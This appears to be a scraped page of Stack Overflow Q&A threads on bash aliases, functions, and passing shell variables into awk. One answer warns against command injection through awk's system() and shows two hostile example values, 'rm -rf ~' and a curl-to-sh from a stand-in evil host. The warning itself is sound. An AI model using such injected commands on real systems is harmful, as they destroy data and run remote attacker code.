Using awk in BASH alias or function - bash

I've a command that works just fine at the command line, but not when I try to put it in an alias or function.
$ awk '{print $1}' /tmp/textfile
0
That's correct, as '0' is in position 1 of "textfile".
$ alias a="awk '{print $1}' /tmp/textfile"
$ a
1 0 136 94
That's the entire line in "textfile". I've tried every variety of quotes, parentheses and backticks that I could imagine might work. I can get the same problem in a wide variety of formats.
What am I not understanding?

You need to escape the $ like so:
alias a="awk '{print \$1}' /tmp/textfile"
Otherwise your alias is:
awk '{print }' /tmp/textfile
Which prints the whole file...
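To see why the escape matters, here is a minimal sketch that stores both versions of the command text in ordinary variables and prints what the shell actually kept. Double quotes behave the same way in an alias definition. The variable names are made up for illustration, and the sketch assumes no positional parameters are set, as in a typical interactive shell.

```shell
#!/usr/bin/env bash
# Assumption: no positional parameters are set, as in a typical interactive shell.
set --

# Inside double quotes, $1 is expanded when the string is built (to nothing here).
unescaped="awk '{print $1}' /tmp/textfile"
# A backslash keeps the dollar sign literal, so awk later sees $1.
escaped="awk '{print \$1}' /tmp/textfile"

printf '%s\n' "$unescaped"   # awk '{print }' /tmp/textfile
printf '%s\n' "$escaped"     # awk '{print $1}' /tmp/textfile
```

After defining the alias, running "alias a" prints the stored definition, which is a quick way to check what was actually saved.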

Use a function instead of alias
myfunc(){ awk '{print $1}' file; }
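A function can also take the file name as an argument, which an alias cannot do cleanly. A small sketch, where the name first_field and the sample data are made up for illustration and the default path is the one from the question:

```shell
#!/usr/bin/env bash
# Hypothetical helper: print the first field of each line.
# Falls back to /tmp/textfile (the path from the question) when no argument is given.
first_field() {
    awk '{print $1}' "${1:-/tmp/textfile}"
}

# Try it on a throwaway sample file.
sample=$(mktemp)
printf 'alpha beta gamma\ndelta epsilon\n' > "$sample"
result=$(first_field "$sample")
printf '%s\n' "$result"
rm -f "$sample"
```

Because the awk program sits inside single quotes in the function body, no extra escaping of $1 is needed.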

Related

awk: using bash variable inside the awk script

The following bash script uses awk to merge file1 and file2 in a particular way: it detects certain marker lines in file2 and inserts all the lines of file1 there.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the both
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2}" >> output.pdb
The problem is that I cannot use the variable "file", which refers to file1 as defined in bash, inside the awk part:
{system("cat file");}
Otherwise, if I paste the full path of file1 here, it works well:
{system("cat /usr/data/temp/data1.pdb");}
How can I fix my awk code so that it can use the bash variable directly?
The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.
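A minimal sketch of that approach, using made-up sample data in temporary files instead of the real .pdb files. It compares NR with FNR to recognise the first file, buffers its lines, and prints them before each marker line, as the original script intended:

```shell
#!/usr/bin/env bash
# Made-up sample data standing in for the two .pdb files.
file1=$(mktemp)
file2=$(mktemp)
printf 'ATOM 1\nATOM 2\n' > "$file1"
printf 'MODEL 1\nENDMDL\nMODEL 2\nENDMDL\n' > "$file2"

merged=$(awk '
    # First file on the command line: NR and FNR are equal, so buffer its lines.
    NR == FNR { data = data $0 ORS; next }
    # Later file: emit the buffered lines before each marker line.
    /^ENDMDL$/ { printf "%s", data }
    { print }
' "$file1" "$file2")

printf '%s\n' "$merged"
rm -f "$file1" "$file2"
```

No shell variable is ever interpreted as code here; the file names are plain arguments. One caveat: if the first file is empty, NR == FNR is also true while reading the second file, so this sketch assumes file1 has at least one line.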
Alternatively, with GNU Awk, use the readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternatively, you can use a while ((getline < file1) > 0) loop to fetch the data.
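The getline variant can be sketched as follows, again with made-up sample data. The file name is passed with -v and only ever used as a file to read, never as part of a shell command:

```shell
#!/usr/bin/env bash
# Made-up sample data standing in for the two .pdb files.
file1=$(mktemp)
file2=$(mktemp)
printf 'ATOM 1\nATOM 2\n' > "$file1"
printf 'MODEL 1\nENDMDL\n' > "$file2"

merged=$(awk -v file1="$file1" '
    BEGIN {
        # getline returns 1 for each line read, 0 at end of file, -1 on error.
        while ((getline line < file1) > 0)
            data = data line ORS
        close(file1)
    }
    /^ENDMDL$/ { printf "%s", data }
    { print }
' "$file2")

printf '%s\n' "$merged"
rm -f "$file1" "$file2"
```

Testing for "> 0" rather than just truthiness matters: an unreadable file makes getline return -1, which would otherwise loop forever.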
This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
This inserts file1 after the marker.
To replace the marker line with the contents of file1:
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2
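Since the question keeps the file names in bash variables, here is a sketch of the first sed command with variables instead of literal names. The sample data is made up, and it assumes the path in file1 contains no newline, because sed's r command takes everything up to the end of the line as the file name:

```shell
#!/usr/bin/env bash
# Made-up sample data standing in for the two .pdb files.
file1=$(mktemp)
file2=$(mktemp)
printf 'ATOM 1\nATOM 2\n' > "$file1"
printf 'MODEL 1\nENDMDL\nEND\n' > "$file2"

# Double quotes let the shell substitute $file1; \$ keeps the regex anchor literal.
merged=$(sed "/^ENDMDL\$/r $file1" "$file2")

printf '%s\n' "$merged"
rm -f "$file1" "$file2"
```

Here the contents of file1 appear after the marker line, not before it as in the awk versions.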

AWK alias not printing

The awk command below (copied and pasted from Stack Overflow) works fine from the command line but doesn't print anything when aliased:
awk '/WORD/ {print $3}' log.log | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'
alias getperc="awk '/WORD/ {print \$3}' log.log | awk 'BEGIN{c=0} length(\$0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'"
I am fairly new to using bash. What am I missing here?
Don't use aliases. They require an additional layer of quoting, which is troublesome (as here), and they prevent you from being able to usefully parameterize or add conditional logic to your code.
A simple transliteration to a function is:
getperc() { awk '/WORD/ {print $3}' log.log | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'; }
A slightly more capable one, which will still use log.log by default, but which will also let you provide an alternate input file name (as in getperc alternate.log) or pipe to your function (as in cat alternate.log | getperc):
getperc() {
[[ -t 0 || $1 ]] || set -- - # use "-" (stdin) as input file if not a TTY
# ...this will let you pipe to your function.
awk '/WORD/ {print $3}' "${1:-log.log}" | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'
}
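One detail in the alias from the question: the $0 in a[c]=$0 is not escaped, so inside the double quotes the shell replaces it with its own $0 (the shell or script name) when the alias is defined. A minimal sketch of that effect, using plain variables with made-up names instead of an alias:

```shell
#!/usr/bin/env bash
# Both strings are built with double quotes, as in the alias definition.
fully_escaped="length(\$0){a[c]=\$0;c++}"
# Here the second $0 is left unescaped and expands to the shell or script name.
partly_escaped="length(\$0){a[c]=$0;c++}"

printf '%s\n' "$fully_escaped"    # length($0){a[c]=$0;c++}
printf '%s\n' "$partly_escaped"   # for example: length($0){a[c]=bash;c++}
```

In a function body the awk program stays inside single quotes, so this kind of partial escaping cannot happen.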
I think bash is confused by $3 and $0: it expands them as the shell's own positional parameters instead of leaving them for awk. You can verify this in bash:
alias ech="echo {print \$3}"
it will print just
{print }
but now try
alias ech="echo {print \$\3}"
it will print what you expected
{print $3}
Let me know if this solves your problem

how to pass in a variable to awk commandline

I'm having some trouble passing bash script variables into awk command-line.
Here is pseudocode:
for FILE in $INPUT_DIR/*.txt; do
filename=`echo $FILE | sed -n 's/^.*\(chr[0-9A-Z]*\).*.vcf$/\1/p'`
OUTPUT_FILE=$OUTPUT_DIR/$filename.snps.txt
egrep -v "^#" $FILE | awk '{print $2,$4,$5}' > $OUTPUT_FILE
done
In the final line, where I use awk to select the columns, I would like the column list to be flexible and supplied by the user. For example, the user might want columns 6, 7 and 8, or columns 133 and 138, or columns 245 through 248. How can I make the 'print $2 ... $5' part come from user input? The user would run the script as: bash script.sh input_dir output_dir [whatever string of columns they want], and I would get those columns in the output. I tried passing it in, but I guess I'm not getting the syntax right.
With awk, you should declare a variable with -v before using it. This is better than the escape method (awk '{print $'$var'}'):
awk -v var1="$col1" -v var2="$col2" 'BEGIN {print var1,var2 }'
Where $col1 and $col2 would be the input variables.
Maybe you can try passing a string such as "$2,$4,$5" as an input variable and printing that variable to get the values (I am not sure if this works).
The following test works for me:
A="\$3" ; ls -l | awk "{ print $A }"
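A variant of the -v approach that takes the whole column list as a single argument might look like the sketch below. The function name print_columns and the comma-separated format are assumptions for illustration, not something from the question. The list is passed as data and split inside awk, so user input never becomes part of the awk program text:

```shell
#!/usr/bin/env bash
# Hypothetical helper.
#   $1: comma-separated column numbers, for example "2,4,5"
#   remaining arguments: input files (stdin is read when there are none)
print_columns() {
    local cols=$1
    shift
    awk -v cols="$cols" '
        BEGIN { n = split(cols, want, ",") }
        {
            # Print the requested fields in order, separated by OFS.
            for (i = 1; i <= n; i++)
                printf "%s%s", $(want[i]), (i < n ? OFS : ORS)
        }
    ' "$@"
}

result=$(printf 'a b c d e\n1 2 3 4 5\n' | print_columns 2,4,5)
printf '%s\n' "$result"
```

In the script from the question, this could replace the fixed awk call, with the column list taken from the third script argument. Ranges such as 245 through 248 would still have to be expanded into individual numbers first.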

Store String var in awk command

I have txt file like this:
Dupont Charles
Martin Paul
Dupuis Jean
For each line, I want to build a login from the first 2 characters of each name.
For instance : Dupont Charles ==> duch
awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt
works perfectly.
But I want to store each login in a variable and call a bash script (script1) with that variable...
awk '{login=tolower(substr($1,1,2)substr($2,1,2));print $login; script1 $login; }' liste.txt
But it does not work, and the content of login is not what I want.
Variables work differently in awk than in Bash: an awk variable has no leading $. So what you want is:
awk '{login=tolower(substr($1,1,2)substr($2,1,2)); print login}' liste.txt
# note: login, instead of $login
However, you also want to call the script script1 with this value. For that, you can either use system() to run an external command from awk, or use a while loop in the shell to handle everything in one place:
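while read -r name surname   # default IFS, so the line is split into two words
do
    # first 2 characters of each name, lowercased
    login=$(printf '%s' "${name:0:2}${surname:0:2}" | tr '[:upper:]' '[:lower:]')
    script1 "$login"
done < liste.txt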
The same ${var:offset:length} expansion can take the first 3 characters of a variable:
$ v="123456789"
$ echo ${v:0:3}
123
awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs script1
e.g. using echo instead of script1 which of course I don't have:
$ awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs echo
duch mapa duje
or if script1 requires 1 arg at a time:
awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs -n1 script1
e.g.
$ awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs -n1 echo
duch
mapa
duje

How to get the desired output

I am getting an input from a shell script, something like:
USER1_OLD:USER1_NEW,USER2_OLD:USER2_NEW ....
The number of key pairs can vary. I need to get output like:
USER1_OLD,USER2_OLD,......
One way using awk:
$ ./script.sh | awk '{printf "%s",NR==1?$1:","$1}' FS=: RS=,
USER1_OLD,USER2_OLD
It's not clear whether you want a trailing comma. If you do, the script can be simpler:
$ ./script.sh | awk '{print $1}' FS=: RS=, ORS=,
USER1_OLD,USER2_OLD,
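Both commands rely on the same idea: with RS set to a comma, each OLD:NEW pair becomes one record, and with FS set to a colon, the OLD part is $1. A sketch of the first variant wrapped in a function, where the name old_names is made up for illustration. Unlike the one-liner above, it also ends the output with a newline:

```shell
#!/usr/bin/env bash
# Hypothetical helper: read "OLD:NEW,OLD:NEW,..." on stdin,
# print the OLD parts joined by commas.
old_names() {
    # RS=, makes each pair a record; -F: makes the part before the colon $1.
    awk -F: -v RS=, '{ printf "%s%s", (NR > 1 ? "," : ""), $1 } END { print "" }'
}

result=$(printf 'USER1_OLD:USER1_NEW,USER2_OLD:USER2_NEW\n' | old_names)
printf '%s\n' "$result"   # USER1_OLD,USER2_OLD
```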
